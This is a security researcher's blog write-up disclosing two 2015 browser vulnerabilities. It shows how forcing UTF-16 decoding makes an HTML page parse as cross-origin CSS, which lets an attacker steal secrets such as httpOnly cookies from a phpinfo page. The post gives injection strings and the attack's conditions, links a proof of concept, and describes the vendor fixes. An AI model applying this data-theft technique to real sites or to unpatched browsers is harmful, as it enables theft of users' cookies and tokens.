This blog post is a write-up of CVE-2015-1287 and CVE-2015-5826

Prologue

If you are a boring person like me and read specs in spare time, you may have come across this potential attack described by the CSP 2 spec:

[..] if the user agent uses a lax CSS parsing algorithm, an attacker might be able to trick the user agent into accepting malicious "stylesheets" hosted by an otherwise trustworthy origin.

Lax Parsing

Unlike JavaScript which stops parsing when a syntax error is encountered, CSS parsing rules allow to ignore certain illegal parts in quirks mode.

How This Was Abused

Back in 2009, Chris Evans discovered that such behavior can lead to cross-domain theft. The way it worked is to find a page which reflects GET paremeters, inject crafted payload and import it in an attacker controlled page. Since a picture is worth a thousand words, here is a picture which depicts the attack:

How the attack is conducted

In short, attackers inject two strings, pre-string ({}#f{font-family:') and post-string (';}) that surround the secret data. The junk is ignored while the payload then turns the secret data into a CSS property (font-family in this case), and can be revealed in computed style. Note that the injected strings do not contain harmful characters (angle brackets) so they will generally not be escaped.

Ultimately this attack can lead to data exfiltration. Since cookie is sent along the request, the stolen data can contain a CSRF token or personal information.

There are however certain restrictions of this attack:

  • The extracted data needs to sit in between the pre-string and post-string. Also having 2 injection points is not uncommon yet not very usual
  • The extracted data cannot contain both single and double quotes at the same time (because the data needs to be treated as a CSS string)
  • The extracted data cannot contain line breaks (CSS string does not support multiple lines)

These conditions are not easy to meet, especially the "no line breaks" requirement as they are inevitable in modern coding style.

How It ended

Internet Explorer and Firefox disabled the ability to import CSS with incorrect MIME type (text/css) cross-origin. Webkit-based browsers on the other hand, used strict parsing (stop parsing when error encountered) for cross-origin CSS for the sake of compatibility. The approach Webkit adopted is also suggested by CSP 2:

[..] User agents SHOULD defend against both attacks using the same mechanism: stricter CSS parsing rules for style sheets with improper MIME types.

Thinking Out Of The Box

The suggested defense looks like a perfect balance: It resolves the issue while not breaking old websites which use incorrect MIME type for CSS. Well, it surely does not break those websites, but it is not unbreakable either. It assumes that it is unlikely for attackers to influence a document in a way such that the content is a valid CSS. What I am going to tell you is that we can indeed make a document syntactically valid with a little help from charset.

Manipulating Charest

The CSS spec defines the precedence of what charset should be used for a CSS:

  1. BOM
  2. Content-Type header (e.g. Content-Type: text/html; charset=utf-8)
  3. Environment encoding (the charset attribute of <link>)

If a page does not specific BOM or charset on Content-Type, the encoding decision will fallback to environemnt encoding which we can control. BOM is not really an issue since it is rarely used. Content-Type header is a bit tough because modern frameworks have it set by default, though it is not uncommon to see a page without charset specified on Content-Type due to verious reasons. Facebook is an example which does not have charset set through Content-Type but instead relies on <meta charset>.

Facebook HTTP Response

Fiddling CSS Syntax

Now to the most interesting part: forcing a document to be a valid CSS. Before that, we need to understand the syntax.

Stylesheet

A CSS is a stylesheet. It has to start with @-rules or rulesets. Since It is nearly impossible for a document to start with @ or pull it out of thin air, we are only interested in ruleset.

Ruleset

A rule is essentially selector + block. Selectors have different types but most of them contain identifier. According to the spec, identifiers can contain only the characters [a-zA-Z0-9] and ISO 10646 characters U+00A0 and higher, plus the hyphen (-) and the underscore (_). Apparently, CSS supports wide range (U+00A0 ~ U+10FFFF) of Unicode characters to be valid identifiers, but penalizes ASCII characters as a single bracket or quote which is common in a HTML document is treated invalid.

How UTF-16 Comes Into Play

Unlike most of the charset, UTF-16 always maps 2 or more bytes into 1 character, even for ASCII.

Charset Mapping

Now you start seeing the pattern: we can tell the parser that the document should be decoded as UTF-16, and all in a sudden the whole document becomes a valid identifier! This is because the transformation "eliminates" all ASCII characters, including line breaks and quotes (a NUL byte is needed for padding for an acutal ASCII character in UTF-16). We then add a wildcard selector (*) so that the following rule matches an element.

So we now have the selector settled, the parser continues to receive block.

Block

At this point we just need to find an injection point and make a block to complete our payload. For declaration, we need a property that accepts arbitrary string value so that we can steal the secret data. font-family is the perfect choice as it supports not only string but also identifier. Let's see what we've got so far:

Identifier(junk), * { font-family: Identifier(secret data)  

And that's it! ...Wait, where is the closing brace (})? Actually we can ignore it and it still remains valid. As per spec, when the parser reaches EOF (End-of-File), the block will be closed automatically. Taking advantage of it, we only need one injection point to perform the attack.

Nosniff?

You may wonder: isn't X-Content-Type-Options exactly there to prevent such attack? Unfortunately, for some reasons Webkit does not honor this header when importing CSS. In other word, having X-Content-Type-Options: nosniff has no effect when the document is being treated as an external CSS.

Limitation

To sum up, the attack works when the following conditions are met:

  • The target does not have charset set in the Content-Type header
  • The injection point does not sanitize NUL byte

Compared with the original attack, the possibility to perform the attack is tremendously increased.

PoC

"PoC || GTFO" - whoever

The following PoC will demonstrate how this attack can steal cookies of victim's from phpinfo. Phpinfo is a common information leakage which contains limited server information and HTTP request information. Normally it is immune from XSS, with this attack
we can exfiltrate httpOnly cookies from victim since it meets all the attack requirements (i.e. no charset on header and accepts NUL bytes).

PoC (Chrome 43, Safari 8 or iOS 8): http://innerht.ml/csstheft/phpinfo.html

PoC on phpinfo

Fix

Webkit and Blink fixed the issue by refusing to load a cross-origin document with incorrect MIME type as CSS.

Patched message

Although patched in modern browsers, I reckon there are still some homemade browsers which are vulnerable.

Further Reading

  • There is also a similar attack for its counterpart JavaScript called XSSI
  • First-Party-Only Cookies is a proposed solution which prevents cookies being sent off in a third-party context
  • Entry Point Regulation is an alternative which restricts documents being used as external resouces, although IMO the manifest is rather verbose

References